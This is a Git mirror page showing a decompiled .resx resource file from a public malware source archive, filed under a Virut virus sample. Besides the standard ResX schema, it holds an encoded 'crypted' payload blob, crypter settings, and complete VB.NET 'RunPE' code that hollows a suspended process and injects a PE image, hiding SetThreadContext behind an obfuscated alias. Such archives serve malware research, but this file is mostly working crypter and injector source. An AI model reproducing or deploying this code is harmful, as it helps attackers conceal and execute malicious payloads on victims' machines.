ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Virus/Win32/V/Virus.Win32.Virut.ce-c41c86f44216c3054b1e45e53e91cc0e9df01ff509ab0ed824899d4e8d19800d/TempRes.resx

223 lines
63 KiB
Plaintext
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="crypted" xml:space="preserve">
<value>3IW45NfLy+n0wPzw18fH/ezY7PTT+fzo3uoD3oLlxOL0wPj018fH6fTH0d7XPD/uzP72/tfG8t30wPj11sfH6fTA+PTTMyIc9MD48NPHx+7zwPj018fH+eTA+PDTx8fp9Mjw9NfX1+n0wPj018fH6PXA+PTXx8fp9MbQuIv9x+n0yPD01v/tGuTQ/vLXx8fp9MDo5NfH1/n0wPj01sbH6fXB+PTXx8fp9MDo5NfHx+n0wPj018fH6fTB7cyJ/cfn+sD49NfBwen0xtDe7f3H6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fXB+PTR0dfp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wMyv/tjP89PA+PTXxvzT9MD48NPHx+TNpsL018fB7/TA+PTXx8fp9MD49NfHx+n0wNLe18Du2Mz6vquF/8vp9MbQ3u39x+n8yPj03sc57vTA+NLxx8fp9MD49NfHx+n0wPj018fH+eTA+OTJycDu9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD48NPHx+D9wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTRPSDhxILiB9fHx+Tj/ML018fX+fTA+NWc7cfp9NDo9NfHx+n0wPj018fH6fTA+PTRwcfp5tLMroT5grmm+vj02cnA7vTA+N79x8fp9NDo9NfG/tH0wMKftPQ/7tmF3NH8PM/Q2YDK2b3wOxvW3A3R5D7jtsmTntre0cfmwJjA0fLHx+n0wPj018fH6fTA+PTXx8fH2sD/89fHx+j1wPj0xDobG/TGDQPXx8fp9MD49NPDx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49MTUx+n0wOrhKuP7+/vf4bKY3z4e4I2y4c/Xx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+bF1QTn+f/X6fTA+PTXx8ftAjnJzuiU/NWk7OS1yi3Dw/3G5OLNiYzcuezntMotw+gMNhbwzuzi1aTtDO/m/YTDxuvk4vLIPd2X/Oe0yi3Dw/3G5eP+nozVpO3mtene2s+0/eTi84+micza57TKLcOj3O/F/c6KiNWk7OPC7eD4rv3G5OLD18fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NLNzez0wfX4x9vL/P/O0tec/cfp9MD49NfHxx4DwOruz4Hw79/q+OzPx8fp9cH49NfB78P0x//y/+nD6fvP+PTXx9f55ND49NfH1/n1wfj018fB7/TA/PDXx8fp9MD49NfX1+n0wPj018fH6fLG+fXXx9f59MD49NfHx+ne6vj018fH7fDA+PDTx8fp9MDo5NfH1/n0wPj018fH7fDA+PTXx8fp9MD49NfHx+n1wfn1xNTG6PTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MfBysPTw+7zwPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fl+MD40/72p7Om+fTG5cfH6fXB+PTXx8fp9MD49dbHx+n0wPj018fH6fTA+PTXx8fD3sD4Ay3Mw+n/28K8wM2FwP7K+PTXwf/T9MD47+rtx+n00Oj018fH6fTA+PTXx8fp9MD49NPDx+nm0sDM18Y3EufUwLOF/df59MD48NPDw+n0yPD018buwfTA+PTXx8fp9MD49NfHx+n0wfn018DA6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD49NfHx+n0wPj018fH6fTA+PTXx8fp9MD4/M+NhODelcvm9/rkxd/rl8rHPN3B9MYU9Ovtx+n4hsL00dne6PjtvqeF6dn58sfGv8DTOjUoHCT10c/qwPA049P9i4PEzue9rcDEgbu+gs/C/eA7+s/wvMPa0f+72ty3ucj02jXn1yTnhfk74saNkbvk7f3T9SnXof/F66THzh/lwe2m3vrH/gcLGz7o2O0H8cDNO93PwOCg/CjPorfNAt2X9JKDnoP+3Or59hvV4SDXl/ykjd8rEfruiIKz2iMZ2fktMtGu2tacufXrw9rxCvyRgNPsDyjWnusy5onI1RTpipmC7h4mJ9D/KjrXtdLHv/3ILsKimYmZsu0uwLbC0pLr6JKG39HuHt+Dl7yu7frS/dXM48qcxsC04zvZuZGdnezZ2ezr38ezKCTmi9IqAeLt4CDPkY7XwZDJwKe295qrxtHQyd4qJwbLzi/Bn+nm2jrapI24yfyxiuva4AvPDN28jvXS2Mb8zZHnMwUYHOTZIN2PutPi4dGDk6+Pp8/f3faJyBEIxP3Yve/budXB7OvTzY6muKCspJTV6tDF6hjln5X4+NqT7uqO3zTP0cvAtO/+xwYby82ywT30rtXyprn0yDMYAijVoccl44Cc7RLgzTbrj7/R1Kf4z/C+4z/MuZnYOMja4+rf4fTbxbvsxbrz3IDZGM3v9pyl6Pu1kuT8JuTmFg3Q9izT4zsT1+y4ydDNzhID16es7O/71cmanszd0IC6pq6Wu/Lvlrmn8/nbxiDPzd7rvKPtyOmxoJTsDy/R7cv95ZemmvzgzAA9+R7M+M0P3462nbuNjY3r1unT/c778/bFFvv65jr/p/vo65/z+bDN3/zTkt/Sv5byw7baz9f++Peno8DngubRgMzF1u+loODDwMPb6PjA6srfsMDi7Q4d75m/5NXZruM3/+3K0ubez9/h1ijZm4HXHubH2Msz++XonNndOM/VlermspeX0s6Rq8W2j+E0CdytqrLm7pi5xsjbp8bHh7ii3iACIjLyzxU5AQsozear1RwkKA/h+BAL2tO2yc3b2ezI0M7D2/3Gw/zB1u+H7usWyNz1Mu2A+fri+Swx2uQQDiQD+Pvr3PP+5q6zzO+Q3e2Dn4eVPy/AtN270zckLAHcibGX6szOo5771aDMzOum3sWws8I/573I78G7l4nuAh3rzAguPsLP7uXP0M7KyfPtzu3vzYPgFvfB0+zC7t/GvefSvPD/gPXOjKPEz4Px+/zI5sPYJir2yvy3qInq2dPvOvfjyo2s2OaB0NiL08fZvPC43iXOOBTX7Nji6JH26gLuyvvCwtr01IPatfrGP/y2+d7zISTi
</data>
<data name="runpe" xml:space="preserve">
<value>Imports System
Imports System.Runtime.InteropServices
Imports System.Text
Namespace Inject
Public Class RunPE
&lt;DllImport("kernel32")&gt; _
Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, &lt;MarshalAs(UnmanagedType.Bool)&gt; ByVal inherit As Boolean, ByVal creation As Integer, _
ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As &lt;MarshalAs(UnmanagedType.Bool)&gt; Boolean
End Function
&lt;DllImport("kernel32")&gt; _
Private Shared Function GetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As &lt;MarshalAs(UnmanagedType.Bool)&gt; Boolean
End Function
&lt;DllImport("ntdll")&gt; _
Private Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
End Function
&lt;DllImport("kernel32")&gt; _
Private Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As &lt;MarshalAs(UnmanagedType.Bool)&gt; Boolean
End Function
&lt;DllImport("kernel32.dll")&gt; _
Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInteger
End Function
Declare Function usegfsuiefgseuf Lib "kernel32" Alias "SetThreadContext" (ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As &lt;MarshalAs(UnmanagedType.Bool)&gt; Boolean
&lt;DllImport("kernel32")&gt; _
Private Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
End Function
&lt;DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)&gt; _
Private Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
End Function
&lt;DllImport("kernel32.dll", SetLastError:=True)&gt; _
Private Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
End Function
Public Shared Function InjectPE() As Boolean
Try
Dim procAttr As IntPtr = IntPtr.Zero
Dim processInfo As IntPtr() = New IntPtr(3) {}
Dim startupInfo As Byte() = New Byte(67) {}
Dim bytes() As Byte = Convert.FromBase64String(%%40%%)
Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &amp;H54))
If CreateProcess(Nothing, New StringBuilder("%%42%%"), procAttr, procAttr, False, 4, _
procAttr, Nothing, startupInfo, processInfo) Then
Dim ctxt As UInteger() = New UInteger(178) {}
ctxt(0) = &amp;H10002
If GetThreadContext(processInfo(1), ctxt) Then
Dim baseAddr As New IntPtr(ctxt(&amp;H29) + 8L)
Dim buffer__1 As IntPtr = IntPtr.Zero
Dim bufferSize As New IntPtr(4)
Dim numRead As IntPtr = IntPtr.Zero
If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then
Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &amp;H34))
Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &amp;H3000, &amp;H40)
Dim lpNumberOfBytesWritten As Integer
WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
Dim num5 As Integer = num - 1
For i As Integer = 0 To num5
Dim dst As Integer() = New Integer(9) {}
Buffer.BlockCopy(bytes, (num2 + &amp;HF8) + (i * 40), dst, 0, 40)
Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)
addr = New IntPtr(buffer2.Length)
size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
Next
size = New IntPtr(ctxt(&amp;H29) + 8L)
addr = New IntPtr(4)
WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
ctxt(&amp;H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
usegfsuiefgseuf(processInfo(1), ctxt)
End If
End If
ResumeThread(processInfo(1))
End If
Catch
Return False
End Try
Return True
End Function
End Class
End Namespace</value>
</data>
<data name="settings" xml:space="preserve">
<value>%STR%vBzvUEEk%0%0%0%0%Critical%%%0%0%</value>
</data>
<data name="bind" xml:space="preserve">
<value />
</data>
</root>
Reference in New Issue Copy Permalink